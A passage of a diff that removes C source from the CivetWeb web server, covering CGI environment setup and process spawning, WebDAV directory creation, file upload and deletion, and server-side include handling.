-		if ((buffered_len < 0) || (conn->consumed_content != 0)) {
-			mg_send_http_error(conn, 500, "%s", "Error: Size mismatch");
-			return 0;
-		}
-
-		if (buffered_len > 0) {
-			if ((int64_t)buffered_len > conn->content_len) {
-				buffered_len = (int)conn->content_len;
-			}
-			body = conn->buf + conn->request_len + conn->consumed_content;
-			push_all(conn->ctx, fp, sock, ssl, body, (int64_t)buffered_len);
-			conn->consumed_content += buffered_len;
-		}
-
-		nread = 0;
-		while (conn->consumed_content < conn->content_len) {
-			to_read = sizeof(buf);
-			if ((int64_t)to_read > conn->content_len - conn->consumed_content) {
-				to_read = (int)(conn->content_len - conn->consumed_content);
-			}
-			nread = pull_inner(NULL, conn, buf, to_read, timeout);
-			if (nread == -2) {
-				/* error */
-				break;
-			}
-			if (nread > 0) {
-				if (push_all(conn->ctx, fp, sock, ssl, buf, nread) != nread) {
-					break;
-				}
-			}
-			conn->consumed_content += nread;
-		}
-
-		if (conn->consumed_content == conn->content_len) {
-			success = (nread >= 0);
-		}
-
-		/* Each error code path in this function must send an error */
-		if (!success) {
-			/* NOTE: Maybe some data has already been sent. */
-			/* TODO (low): If some data has been sent, a correct error
-			 * reply can no longer be sent, so just close the connection */
-			mg_send_http_error(conn, 500, "%s", "");
-		}
-	}
-
-	return success;
-}
-#endif
-
-#if !defined(NO_CGI)
-/* This structure helps to create an environment for the spawned CGI
- * program.
- * Environment is an array of "VARIABLE=VALUE\0" ASCIIZ strings,
- * last element must be NULL.
- * However, on Windows there is a requirement that all these
- * VARIABLE=VALUE\0
- * strings must reside in a contiguous buffer. The end of the buffer is
- * marked by two '\0' characters.
- * We satisfy both worlds: we create an envp array (which is vars), all
- * entries are actually pointers inside buf. */
-struct cgi_environment {
-	struct mg_connection *conn;
-	/* Data block */
-	char *buf;      /* Environment buffer */
-	size_t buflen;  /* Space available in buf */
-	size_t bufused; /* Space taken in buf */
-	                /* Index block */
-	char **var;     /* char **envp */
-	size_t varlen;  /* Number of variables available in var */
-	size_t varused; /* Number of variables stored in var */
-};
-
-
-static void addenv(struct cgi_environment *env,
-                   PRINTF_FORMAT_STRING(const char *fmt),
-                   ...) PRINTF_ARGS(2, 3);
-
-/* Append VARIABLE=VALUE\0 string to the buffer, and add a respective
- * pointer into the vars array. Assumes env != NULL and fmt != NULL. */
-static void
-addenv(struct cgi_environment *env, const char *fmt, ...)
-{
-	size_t n, space;
-	int truncated = 0;
-	char *added;
-	va_list ap;
-
-	/* Calculate how much space is left in the buffer */
-	space = (env->buflen - env->bufused);
-
-	/* Calculate an estimate for the required space */
-	n = strlen(fmt) + 2 + 128;
-
-	do {
-		if (space <= n) {
-			/* Allocate new buffer */
-			n = env->buflen + CGI_ENVIRONMENT_SIZE;
-			added = (char *)mg_realloc_ctx(env->buf, n, env->conn->ctx);
-			if (!added) {
-				/* Out of memory */
-				mg_cry(env->conn,
-				       "%s: Cannot allocate memory for CGI variable [%s]",
-				       __func__,
-				       fmt);
-				return;
-			}
-			env->buf = added;
-			env->buflen = n;
-			space = (env->buflen - env->bufused);
-		}
-
-		/* Make a pointer to the free space int the buffer */
-		added = env->buf + env->bufused;
-
-		/* Copy VARIABLE=VALUE\0 string into the free space */
-		va_start(ap, fmt);
-		mg_vsnprintf(env->conn, &truncated, added, (size_t)space, fmt, ap);
-		va_end(ap);
-
-		/* Do not add truncated strings to the environment */
-		if (truncated) {
-			/* Reallocate the buffer */
-			space = 0;
-			n = 1;
-		}
-	} while (truncated);
-
-	/* Calculate number of bytes added to the environment */
-	n = strlen(added) + 1;
-	env->bufused += n;
-
-	/* Now update the variable index */
-	space = (env->varlen - env->varused);
-	if (space < 2) {
-		mg_cry(env->conn,
-		       "%s: Cannot register CGI variable [%s]",
-		       __func__,
-		       fmt);
-		return;
-	}
-
-	/* Append a pointer to the added string into the envp array */
-	env->var[env->varused] = added;
-	env->varused++;
-}
-
-/* Return 0 on success, non-zero if an error occurs. */
-
-static int
-prepare_cgi_environment(struct mg_connection *conn,
-                        const char *prog,
-                        struct cgi_environment *env)
-{
-	const char *s;
-	struct vec var_vec;
-	char *p, src_addr[IP_ADDR_STR_LEN], http_var_name[128];
-	int i, truncated, uri_len;
-
-	if ((conn == NULL) || (prog == NULL) || (env == NULL)) {
-		return -1;
-	}
-
-	env->conn = conn;
-	env->buflen = CGI_ENVIRONMENT_SIZE;
-	env->bufused = 0;
-	env->buf = (char *)mg_malloc_ctx(env->buflen, conn->ctx);
-	if (env->buf == NULL) {
-		mg_cry(conn,
-		       "%s: Not enough memory for environmental buffer",
-		       __func__);
-		return -1;
-	}
-	env->varlen = MAX_CGI_ENVIR_VARS;
-	env->varused = 0;
-	env->var = (char **)mg_malloc_ctx(env->buflen * sizeof(char *), conn->ctx);
-	if (env->var == NULL) {
-		mg_cry(conn,
-		       "%s: Not enough memory for environmental variables",
-		       __func__);
-		mg_free(env->buf);
-		return -1;
-	}
-
-	addenv(env, "SERVER_NAME=%s", conn->ctx->config[AUTHENTICATION_DOMAIN]);
-	addenv(env, "SERVER_ROOT=%s", conn->ctx->config[DOCUMENT_ROOT]);
-	addenv(env, "DOCUMENT_ROOT=%s", conn->ctx->config[DOCUMENT_ROOT]);
-	addenv(env, "SERVER_SOFTWARE=%s/%s", "Civetweb", mg_version());
-
-	/* Prepare the environment block */
-	addenv(env, "%s", "GATEWAY_INTERFACE=CGI/1.1");
-	addenv(env, "%s", "SERVER_PROTOCOL=HTTP/1.1");
-	addenv(env, "%s", "REDIRECT_STATUS=200"); /* For PHP */
-
-#if defined(USE_IPV6)
-	if (conn->client.lsa.sa.sa_family == AF_INET6) {
-		addenv(env, "SERVER_PORT=%d", ntohs(conn->client.lsa.sin6.sin6_port));
-	} else
-#endif
-	{
-		addenv(env, "SERVER_PORT=%d", ntohs(conn->client.lsa.sin.sin_port));
-	}
-
-	sockaddr_to_string(src_addr, sizeof(src_addr), &conn->client.rsa);
-	addenv(env, "REMOTE_ADDR=%s", src_addr);
-
-	addenv(env, "REQUEST_METHOD=%s", conn->request_info.request_method);
-	addenv(env, "REMOTE_PORT=%d", conn->request_info.remote_port);
-
-	addenv(env, "REQUEST_URI=%s", conn->request_info.request_uri);
-	addenv(env, "LOCAL_URI=%s", conn->request_info.local_uri);
-
-	/* SCRIPT_NAME */
-	uri_len = (int)strlen(conn->request_info.local_uri);
-	if (conn->path_info == NULL) {
-		if (conn->request_info.local_uri[uri_len - 1] != '/') {
-			/* URI: /path_to_script/script.cgi */
-			addenv(env, "SCRIPT_NAME=%s", conn->request_info.local_uri);
-		} else {
-			/* URI: /path_to_script/ ... using index.cgi */
-			const char *index_file = strrchr(prog, '/');
-			if (index_file) {
-				addenv(env,
-				       "SCRIPT_NAME=%s%s",
-				       conn->request_info.local_uri,
-				       index_file + 1);
-			}
-		}
-	} else {
-		/* URI: /path_to_script/script.cgi/path_info */
-		addenv(env,
-		       "SCRIPT_NAME=%.*s",
-		       uri_len - (int)strlen(conn->path_info),
-		       conn->request_info.local_uri);
-	}
-
-	addenv(env, "SCRIPT_FILENAME=%s", prog);
-	if (conn->path_info == NULL) {
-		addenv(env, "PATH_TRANSLATED=%s", conn->ctx->config[DOCUMENT_ROOT]);
-	} else {
-		addenv(env,
-		       "PATH_TRANSLATED=%s%s",
-		       conn->ctx->config[DOCUMENT_ROOT],
-		       conn->path_info);
-	}
-
-	addenv(env, "HTTPS=%s", (conn->ssl == NULL) ? "off" : "on");
-
-	if ((s = mg_get_header(conn, "Content-Type")) != NULL) {
-		addenv(env, "CONTENT_TYPE=%s", s);
-	}
-	if (conn->request_info.query_string != NULL) {
-		addenv(env, "QUERY_STRING=%s", conn->request_info.query_string);
-	}
-	if ((s = mg_get_header(conn, "Content-Length")) != NULL) {
-		addenv(env, "CONTENT_LENGTH=%s", s);
-	}
-	if ((s = getenv("PATH")) != NULL) {
-		addenv(env, "PATH=%s", s);
-	}
-	if (conn->path_info != NULL) {
-		addenv(env, "PATH_INFO=%s", conn->path_info);
-	}
-
-	if (conn->status_code > 0) {
-		/* CGI error handler should show the status code */
-		addenv(env, "STATUS=%d", conn->status_code);
-	}
-
-#if defined(_WIN32)
-	if ((s = getenv("COMSPEC")) != NULL) {
-		addenv(env, "COMSPEC=%s", s);
-	}
-	if ((s = getenv("SYSTEMROOT")) != NULL) {
-		addenv(env, "SYSTEMROOT=%s", s);
-	}
-	if ((s = getenv("SystemDrive")) != NULL) {
-		addenv(env, "SystemDrive=%s", s);
-	}
-	if ((s = getenv("ProgramFiles")) != NULL) {
-		addenv(env, "ProgramFiles=%s", s);
-	}
-	if ((s = getenv("ProgramFiles(x86)")) != NULL) {
-		addenv(env, "ProgramFiles(x86)=%s", s);
-	}
-#else
-	if ((s = getenv("LD_LIBRARY_PATH")) != NULL) {
-		addenv(env, "LD_LIBRARY_PATH=%s", s);
-	}
-#endif /* _WIN32 */
-
-	if ((s = getenv("PERLLIB")) != NULL) {
-		addenv(env, "PERLLIB=%s", s);
-	}
-
-	if (conn->request_info.remote_user != NULL) {
-		addenv(env, "REMOTE_USER=%s", conn->request_info.remote_user);
-		addenv(env, "%s", "AUTH_TYPE=Digest");
-	}
-
-	/* Add all headers as HTTP_* variables */
-	for (i = 0; i < conn->request_info.num_headers; i++) {
-
-		(void)mg_snprintf(conn,
-		                  &truncated,
-		                  http_var_name,
-		                  sizeof(http_var_name),
-		                  "HTTP_%s",
-		                  conn->request_info.http_headers[i].name);
-
-		if (truncated) {
-			mg_cry(conn,
-			       "%s: HTTP header variable too long [%s]",
-			       __func__,
-			       conn->request_info.http_headers[i].name);
-			continue;
-		}
-
-		/* Convert variable name into uppercase, and change - to _ */
-		for (p = http_var_name; *p != '\0'; p++) {
-			if (*p == '-') {
-				*p = '_';
-			}
-			*p = (char)toupper(*(unsigned char *)p);
-		}
-
-		addenv(env,
-		       "%s=%s",
-		       http_var_name,
-		       conn->request_info.http_headers[i].value);
-	}
-
-	/* Add user-specified variables */
-	s = conn->ctx->config[CGI_ENVIRONMENT];
-	while ((s = next_option(s, &var_vec, NULL)) != NULL) {
-		addenv(env, "%.*s", (int)var_vec.len, var_vec.ptr);
-	}
-
-	env->var[env->varused] = NULL;
-	env->buf[env->bufused] = '\0';
-
-	return 0;
-}
-
-
-static void
-handle_cgi_request(struct mg_connection *conn, const char *prog)
-{
-	char *buf;
-	size_t buflen;
-	int headers_len, data_len, i, truncated;
-	int fdin[2] = {-1, -1}, fdout[2] = {-1, -1}, fderr[2] = {-1, -1};
-	const char *status, *status_text, *connection_state;
-	char *pbuf, dir[PATH_MAX], *p;
-	struct mg_request_info ri;
-	struct cgi_environment blk;
-	FILE *in = NULL, *out = NULL, *err = NULL;
-	struct mg_file fout = STRUCT_FILE_INITIALIZER;
-	pid_t pid = (pid_t)-1;
-
-	if (conn == NULL) {
-		return;
-	}
-
-	buf = NULL;
-	buflen = 16384;
-	i = prepare_cgi_environment(conn, prog, &blk);
-	if (i != 0) {
-		blk.buf = NULL;
-		blk.var = NULL;
-		goto done;
-	}
-
-	/* CGI must be executed in its own directory. 'dir' must point to the
-	 * directory containing executable program, 'p' must point to the
-	 * executable program name relative to 'dir'. */
-	(void)mg_snprintf(conn, &truncated, dir, sizeof(dir), "%s", prog);
-
-	if (truncated) {
-		mg_cry(conn, "Error: CGI program \"%s\": Path too long", prog);
-		mg_send_http_error(conn, 500, "Error: %s", "CGI path too long");
-		goto done;
-	}
-
-	if ((p = strrchr(dir, '/')) != NULL) {
-		*p++ = '\0';
-	} else {
-		dir[0] = '.';
-		dir[1] = '\0';
-		p = (char *)prog;
-	}
-
-	if ((pipe(fdin) != 0) || (pipe(fdout) != 0) || (pipe(fderr) != 0)) {
-		status = strerror(ERRNO);
-		mg_cry(conn,
-		       "Error: CGI program \"%s\": Can not create CGI pipes: %s",
-		       prog,
-		       status);
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Cannot create CGI pipe: %s",
-		                   status);
-		goto done;
-	}
-
-	DEBUG_TRACE("CGI: spawn %s %s\n", dir, p);
-	pid = spawn_process(conn, p, blk.buf, blk.var, fdin, fdout, fderr, dir);
-
-	if (pid == (pid_t)-1) {
-		status = strerror(ERRNO);
-		mg_cry(conn,
-		       "Error: CGI program \"%s\": Can not spawn CGI process: %s",
-		       prog,
-		       status);
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Cannot spawn CGI process [%s]: %s",
-		                   prog,
-		                   status);
-		goto done;
-	}
-
-	/* Make sure child closes all pipe descriptors. It must dup them to 0,1
-	 */
-	set_close_on_exec((SOCKET)fdin[0], conn);  /* stdin read */
-	set_close_on_exec((SOCKET)fdout[1], conn); /* stdout write */
-	set_close_on_exec((SOCKET)fderr[1], conn); /* stderr write */
-	set_close_on_exec((SOCKET)fdin[1], conn);  /* stdin write */
-	set_close_on_exec((SOCKET)fdout[0], conn); /* stdout read */
-	set_close_on_exec((SOCKET)fderr[0], conn); /* stderr read */
-
-	/* Parent closes only one side of the pipes.
-	 * If we don't mark them as closed, close() attempt before
-	 * return from this function throws an exception on Windows.
-	 * Windows does not like when closed descriptor is closed again. */
-	(void)close(fdin[0]);
-	(void)close(fdout[1]);
-	(void)close(fderr[1]);
-	fdin[0] = fdout[1] = fderr[1] = -1;
-
-	if ((in = fdopen(fdin[1], "wb")) == NULL) {
-		status = strerror(ERRNO);
-		mg_cry(conn,
-		       "Error: CGI program \"%s\": Can not open stdin: %s",
-		       prog,
-		       status);
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: CGI can not open fdin\nfopen: %s",
-		                   status);
-		goto done;
-	}
-
-	if ((out = fdopen(fdout[0], "rb")) == NULL) {
-		status = strerror(ERRNO);
-		mg_cry(conn,
-		       "Error: CGI program \"%s\": Can not open stdout: %s",
-		       prog,
-		       status);
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: CGI can not open fdout\nfopen: %s",
-		                   status);
-		goto done;
-	}
-
-	if ((err = fdopen(fderr[0], "rb")) == NULL) {
-		status = strerror(ERRNO);
-		mg_cry(conn,
-		       "Error: CGI program \"%s\": Can not open stderr: %s",
-		       prog,
-		       status);
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: CGI can not open fdout\nfopen: %s",
-		                   status);
-		goto done;
-	}
-
-	setbuf(in, NULL);
-	setbuf(out, NULL);
-	setbuf(err, NULL);
-	fout.access.fp = out;
-
-	if ((conn->request_info.content_length != 0) || (conn->is_chunked)) {
-		DEBUG_TRACE("CGI: send body data (%lli)\n",
-		            (signed long long)conn->request_info.content_length);
-
-		/* This is a POST/PUT request, or another request with body data. */
-		if (!forward_body_data(conn, in, INVALID_SOCKET, NULL)) {
-			/* Error sending the body data */
-			mg_cry(conn,
-			       "Error: CGI program \"%s\": Forward body data failed",
-			       prog);
-			goto done;
-		}
-	}
-
-	/* Close so child gets an EOF. */
-	fclose(in);
-	in = NULL;
-	fdin[1] = -1;
-
-	/* Now read CGI reply into a buffer. We need to set correct
-	 * status code, thus we need to see all HTTP headers first.
-	 * Do not send anything back to client, until we buffer in all
-	 * HTTP headers. */
-	data_len = 0;
-	buf = (char *)mg_malloc_ctx(buflen, conn->ctx);
-	if (buf == NULL) {
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Not enough memory for CGI buffer (%u bytes)",
-		                   (unsigned int)buflen);
-		mg_cry(conn,
-		       "Error: CGI program \"%s\": Not enough memory for buffer (%u "
-		       "bytes)",
-		       prog,
-		       (unsigned int)buflen);
-		goto done;
-	}
-
-	DEBUG_TRACE("CGI: %s", "wait for response");
-	headers_len = read_message(out, conn, buf, (int)buflen, &data_len);
-	DEBUG_TRACE("CGI: response: %li", (signed long)headers_len);
-
-	if (headers_len <= 0) {
-
-		/* Could not parse the CGI response. Check if some error message on
-		 * stderr. */
-		i = pull_all(err, conn, buf, (int)buflen);
-		if (i > 0) {
-			mg_cry(conn,
-			       "Error: CGI program \"%s\" sent error "
-			       "message: [%.*s]",
-			       prog,
-			       i,
-			       buf);
-			mg_send_http_error(conn,
-			                   500,
-			                   "Error: CGI program \"%s\" sent error "
-			                   "message: [%.*s]",
-			                   prog,
-			                   i,
-			                   buf);
-		} else {
-			mg_cry(conn,
-			       "Error: CGI program sent malformed or too big "
-			       "(>%u bytes) HTTP headers: [%.*s]",
-			       (unsigned)buflen,
-			       data_len,
-			       buf);
-
-			mg_send_http_error(conn,
-			                   500,
-			                   "Error: CGI program sent malformed or too big "
-			                   "(>%u bytes) HTTP headers: [%.*s]",
-			                   (unsigned)buflen,
-			                   data_len,
-			                   buf);
-		}
-
-		goto done;
-	}
-
-	pbuf = buf;
-	buf[headers_len - 1] = '\0';
-	ri.num_headers = parse_http_headers(&pbuf, ri.http_headers);
-
-	/* Make up and send the status line */
-	status_text = "OK";
-	if ((status = get_header(ri.http_headers, ri.num_headers, "Status"))
-	    != NULL) {
-		conn->status_code = atoi(status);
-		status_text = status;
-		while (isdigit(*(const unsigned char *)status_text)
-		       || *status_text == ' ') {
-			status_text++;
-		}
-	} else if (get_header(ri.http_headers, ri.num_headers, "Location")
-	           != NULL) {
-		conn->status_code = 302;
-	} else {
-		conn->status_code = 200;
-	}
-	connection_state =
-	    get_header(ri.http_headers, ri.num_headers, "Connection");
-	if (!header_has_option(connection_state, "keep-alive")) {
-		conn->must_close = 1;
-	}
-
-	DEBUG_TRACE("CGI: response %u %s", conn->status_code, status_text);
-
-	(void)mg_printf(conn, "HTTP/1.1 %d %s\r\n", conn->status_code, status_text);
-
-	/* Send headers */
-	for (i = 0; i < ri.num_headers; i++) {
-		mg_printf(conn,
-		          "%s: %s\r\n",
-		          ri.http_headers[i].name,
-		          ri.http_headers[i].value);
-	}
-	mg_write(conn, "\r\n", 2);
-
-	/* Send chunk of data that may have been read after the headers */
-	mg_write(conn, buf + headers_len, (size_t)(data_len - headers_len));
-
-	/* Read the rest of CGI output and send to the client */
-	send_file_data(conn, &fout, 0, INT64_MAX);
-
-	DEBUG_TRACE("CGI: %s", "all data sent");
-
-done:
-	mg_free(blk.var);
-	mg_free(blk.buf);
-
-	if (pid != (pid_t)-1) {
-		kill(pid, SIGKILL);
-#if !defined(_WIN32)
-		{
-			int st;
-			while (waitpid(pid, &st, 0) != -1)
-				; /* clean zombies */
-		}
-#endif
-	}
-	if (fdin[0] != -1) {
-		close(fdin[0]);
-	}
-	if (fdout[1] != -1) {
-		close(fdout[1]);
-	}
-
-	if (in != NULL) {
-		fclose(in);
-	} else if (fdin[1] != -1) {
-		close(fdin[1]);
-	}
-
-	if (out != NULL) {
-		fclose(out);
-	} else if (fdout[0] != -1) {
-		close(fdout[0]);
-	}
-
-	if (err != NULL) {
-		fclose(err);
-	} else if (fderr[0] != -1) {
-		close(fderr[0]);
-	}
-
-	if (buf != NULL) {
-		mg_free(buf);
-	}
-}
-#endif /* !NO_CGI */
-
-
-#if !defined(NO_FILES)
-static void
-mkcol(struct mg_connection *conn, const char *path)
-{
-	int rc, body_len;
-	struct de de;
-	char date[64];
-	time_t curtime = time(NULL);
-
-	if (conn == NULL) {
-		return;
-	}
-
-	/* TODO (mid): Check the mg_send_http_error situations in this function
-	 */
-
-	memset(&de.file, 0, sizeof(de.file));
-	if (!mg_stat(conn, path, &de.file)) {
-		mg_cry(conn,
-		       "%s: mg_stat(%s) failed: %s",
-		       __func__,
-		       path,
-		       strerror(ERRNO));
-	}
-
-	if (de.file.last_modified) {
-		/* TODO (mid): This check does not seem to make any sense ! */
-		/* TODO (mid): Add a webdav unit test first, before changing
-		 * anything here. */
-		mg_send_http_error(
-		    conn, 405, "Error: mkcol(%s): %s", path, strerror(ERRNO));
-		return;
-	}
-
-	body_len = conn->data_len - conn->request_len;
-	if (body_len > 0) {
-		mg_send_http_error(
-		    conn, 415, "Error: mkcol(%s): %s", path, strerror(ERRNO));
-		return;
-	}
-
-	rc = mg_mkdir(conn, path, 0755);
-
-	if (rc == 0) {
-		conn->status_code = 201;
-		gmt_time_string(date, sizeof(date), &curtime);
-		mg_printf(conn,
-		          "HTTP/1.1 %d Created\r\n"
-		          "Date: %s\r\n",
-		          conn->status_code,
-		          date);
-		send_static_cache_header(conn);
-		send_additional_header(conn);
-		mg_printf(conn,
-		          "Content-Length: 0\r\n"
-		          "Connection: %s\r\n\r\n",
-		          suggest_connection_header(conn));
-	} else if (rc == -1) {
-		if (errno == EEXIST) {
-			mg_send_http_error(
-			    conn, 405, "Error: mkcol(%s): %s", path, strerror(ERRNO));
-		} else if (errno == EACCES) {
-			mg_send_http_error(
-			    conn, 403, "Error: mkcol(%s): %s", path, strerror(ERRNO));
-		} else if (errno == ENOENT) {
-			mg_send_http_error(
-			    conn, 409, "Error: mkcol(%s): %s", path, strerror(ERRNO));
-		} else {
-			mg_send_http_error(
-			    conn, 500, "fopen(%s): %s", path, strerror(ERRNO));
-		}
-	}
-}
-
-
-static void
-put_file(struct mg_connection *conn, const char *path)
-{
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	const char *range;
-	int64_t r1, r2;
-	int rc;
-	char date[64];
-	time_t curtime = time(NULL);
-
-	if (conn == NULL) {
-		return;
-	}
-
-	if (mg_stat(conn, path, &file.stat)) {
-		/* File already exists */
-		conn->status_code = 200;
-
-		if (file.stat.is_directory) {
-			/* This is an already existing directory,
-			 * so there is nothing to do for the server. */
-			rc = 0;
-
-		} else {
-			/* File exists and is not a directory. */
-			/* Can it be replaced? */
-
-			if (file.access.membuf != NULL) {
-				/* This is an "in-memory" file, that can not be replaced */
-				mg_send_http_error(conn,
-				                   405,
-				                   "Error: Put not possible\nReplacing %s "
-				                   "is not supported",
-				                   path);
-				return;
-			}
-
-			/* Check if the server may write this file */
-			if (access(path, W_OK) == 0) {
-				/* Access granted */
-				conn->status_code = 200;
-				rc = 1;
-			} else {
-				mg_send_http_error(
-				    conn,
-				    403,
-				    "Error: Put not possible\nReplacing %s is not allowed",
-				    path);
-				return;
-			}
-		}
-	} else {
-		/* File should be created */
-		conn->status_code = 201;
-		rc = put_dir(conn, path);
-	}
-
-	if (rc == 0) {
-		/* put_dir returns 0 if path is a directory */
-		gmt_time_string(date, sizeof(date), &curtime);
-		mg_printf(conn,
-		          "HTTP/1.1 %d %s\r\n",
-		          conn->status_code,
-		          mg_get_response_code_text(NULL, conn->status_code));
-		send_no_cache_header(conn);
-		send_additional_header(conn);
-		mg_printf(conn,
-		          "Date: %s\r\n"
-		          "Content-Length: 0\r\n"
-		          "Connection: %s\r\n\r\n",
-		          date,
-		          suggest_connection_header(conn));
-
-		/* Request to create a directory has been fulfilled successfully.
-		 * No need to put a file. */
-		return;
-	}
-
-	if (rc == -1) {
-		/* put_dir returns -1 if the path is too long */
-		mg_send_http_error(conn,
-		                   414,
-		                   "Error: Path too long\nput_dir(%s): %s",
-		                   path,
-		                   strerror(ERRNO));
-		return;
-	}
-
-	if (rc == -2) {
-		/* put_dir returns -2 if the directory can not be created */
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Can not create directory\nput_dir(%s): %s",
-		                   path,
-		                   strerror(ERRNO));
-		return;
-	}
-
-	/* A file should be created or overwritten. */
-	/* Currently CivetWeb does not nead read+write access. */
-	if (!mg_fopen(conn, path, MG_FOPEN_MODE_WRITE, &file)
-	    || file.access.fp == NULL) {
-		(void)mg_fclose(&file.access);
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Can not create file\nfopen(%s): %s",
-		                   path,
-		                   strerror(ERRNO));
-		return;
-	}
-
-	fclose_on_exec(&file.access, conn);
-	range = mg_get_header(conn, "Content-Range");
-	r1 = r2 = 0;
-	if ((range != NULL) && parse_range_header(range, &r1, &r2) > 0) {
-		conn->status_code = 206; /* Partial content */
-		fseeko(file.access.fp, r1, SEEK_SET);
-	}
-
-	if (!forward_body_data(conn, file.access.fp, INVALID_SOCKET, NULL)) {
-		/* forward_body_data failed.
-		 * The error code has already been sent to the client,
-		 * and conn->status_code is already set. */
-		(void)mg_fclose(&file.access);
-		return;
-	}
-
-	if (mg_fclose(&file.access) != 0) {
-		/* fclose failed. This might have different reasons, but a likely
-		 * one is "no space on disk", http 507. */
-		conn->status_code = 507;
-	}
-
-	gmt_time_string(date, sizeof(date), &curtime);
-	mg_printf(conn,
-	          "HTTP/1.1 %d %s\r\n",
-	          conn->status_code,
-	          mg_get_response_code_text(NULL, conn->status_code));
-	send_no_cache_header(conn);
-	send_additional_header(conn);
-	mg_printf(conn,
-	          "Date: %s\r\n"
-	          "Content-Length: 0\r\n"
-	          "Connection: %s\r\n\r\n",
-	          date,
-	          suggest_connection_header(conn));
-}
-
-
-static void
-delete_file(struct mg_connection *conn, const char *path)
-{
-	struct de de;
-	memset(&de.file, 0, sizeof(de.file));
-	if (!mg_stat(conn, path, &de.file)) {
-		/* mg_stat returns 0 if the file does not exist */
-		mg_send_http_error(conn,
-		                   404,
-		                   "Error: Cannot delete file\nFile %s not found",
-		                   path);
-		return;
-	}
-
-#if 0 /* Ignore if a file in memory is inside a folder */
-        if (de.access.membuf != NULL) {
-                /* the file is cached in memory */
-                mg_send_http_error(
-                    conn,
-                    405,
-                    "Error: Delete not possible\nDeleting %s is not supported",
-                    path);
-                return;
-        }
-#endif
-
-	if (de.file.is_directory) {
-		if (remove_directory(conn, path)) {
-			/* Delete is successful: Return 204 without content. */
-			mg_send_http_error(conn, 204, "%s", "");
-		} else {
-			/* Delete is not successful: Return 500 (Server error). */
-			mg_send_http_error(conn, 500, "Error: Could not delete %s", path);
-		}
-		return;
-	}
-
-	/* This is an existing file (not a directory).
-	 * Check if write permission is granted. */
-	if (access(path, W_OK) != 0) {
-		/* File is read only */
-		mg_send_http_error(
-		    conn,
-		    403,
-		    "Error: Delete not possible\nDeleting %s is not allowed",
-		    path);
-		return;
-	}
-
-	/* Try to delete it. */
-	if (mg_remove(conn, path) == 0) {
-		/* Delete was successful: Return 204 without content. */
-		mg_send_http_error(conn, 204, "%s", "");
-	} else {
-		/* Delete not successful (file locked). */
-		mg_send_http_error(conn,
-		                   423,
-		                   "Error: Cannot delete file\nremove(%s): %s",
-		                   path,
-		                   strerror(ERRNO));
-	}
-}
-#endif /* !NO_FILES */
-
-
-static void
-send_ssi_file(struct mg_connection *, const char *, struct mg_file *, int);
-
-
-static void
-do_ssi_include(struct mg_connection *conn,
-               const char *ssi,
-               char *tag,
-               int include_level)
-{
-	char file_name[MG_BUF_LEN], path[512], *p;
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	size_t len;
-	int truncated = 0;
-
-	if (conn == NULL) {
-		return;
-	}
-
-	/* sscanf() is safe here, since send_ssi_file() also uses buffer
-	 * of size MG_BUF_LEN to get the tag. So strlen(tag) is
-	 * always < MG_BUF_LEN. */
-	if (sscanf(tag, " virtual=\"%511[^\"]\"", file_name) == 1) {
-		/* File name is relative to the webserver root */
-		file_name[511] = 0;
-		(void)mg_snprintf(conn,
-		                  &truncated,
-		                  path,
-		                  sizeof(path),
-		                  "%s/%s",
-		                  conn->ctx->config[DOCUMENT_ROOT],
-		                  file_name);
-
-	} else if (sscanf(tag, " abspath=\"%511[^\"]\"", file_name) == 1) {
-		/* File name is relative to the webserver working directory
-		 * or it is absolute system path */
-		file_name[511] = 0;
-		(void)
-		    mg_snprintf(conn, &truncated, path, sizeof(path), "%s", file_name);
-
-	} else if ((sscanf(tag, " file=\"%511[^\"]\"", file_name) == 1)
-	           || (sscanf(tag, " \"%511[^\"]\"", file_name) == 1)) {
-		/* File name is relative to the currect document */
-		file_name[511] = 0;
-		(void)mg_snprintf(conn, &truncated, path, sizeof(path), "%s", ssi);
-
-		if (!truncated) {
-			if ((p = strrchr(path, '/')) != NULL) {
-				p[1] = '\0';
-			}
-			len = strlen(path);
-			(void)mg_snprintf(conn,
-			                  &truncated,
-			                  path + len,
-			                  sizeof(path) - len,
-			                  "%s",
-			                  file_name);
-		}
-
-	} else {
-		mg_cry(conn, "Bad SSI #include: [%s]", tag);
-		return;
-	}
-
-	if (truncated) {
-		mg_cry(conn, "SSI #include path length overflow: [%s]", tag);
-		return;
-	}
-
-	if (!mg_fopen(conn, path, MG_FOPEN_MODE_READ, &file)) {
-		mg_cry(conn,
-		       "Cannot open SSI #include: [%s]: fopen(%s): %s",
-		       tag,
-		       path,
-		       strerror(ERRNO));
-	} else {
-		fclose_on_exec(&file.access, conn);
-		if (match_prefix(conn->ctx->config[SSI_EXTENSIONS],
-		                 strlen(conn->ctx->config[SSI_EXTENSIONS]),
-		                 path) > 0) {
-			send_ssi_file(conn, path, &file, include_level + 1);
-		} else {
-			send_file_data(conn, &file, 0, INT64_MAX);
-		}
-		(void)mg_fclose(&file.access); /* Ignore errors for readonly files */
-	}
-}
-
-
-#if !defined(NO_POPEN)
-static void
-do_ssi_exec(struct mg_connection *conn, char *tag)
-{
-	char cmd[1024] = "";
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-
-	if (sscanf(tag, " \"%1023[^\"]\"", cmd) != 1) {
-		mg_cry(conn, "Bad SSI #exec: [%s]", tag);
-	} else {
-		cmd[1023] = 0;
-		if ((file.access.fp = popen(cmd, "r")) == NULL) {
-			mg_cry(conn, "Cannot SSI #exec: [%s]: %s", cmd, strerror(ERRNO));
-		} else {
-			send_file_data(conn, &file, 0, INT64_MAX);
-			pclose(file.access.fp);
-		}
-	}
-}
-#endif /* !NO_POPEN */
-
-
-static int
-mg_fgetc(struct mg_file *filep, int offset)
-{
-	if (filep == NULL) {
-		return EOF;
-	}
-	if ((filep->access.membuf != NULL) && (offset >= 0)
-	    && (((unsigned int)(offset)) < filep->stat.size)) {
-		return ((const unsigned char *)filep->access.membuf)[offset];
-	} else if (filep->access.fp != NULL) {
-		return fgetc(filep->access.fp);
-	} else {
-		return EOF;
-	}
-}
-
-
-static void
-send_ssi_file(struct mg_connection *conn,
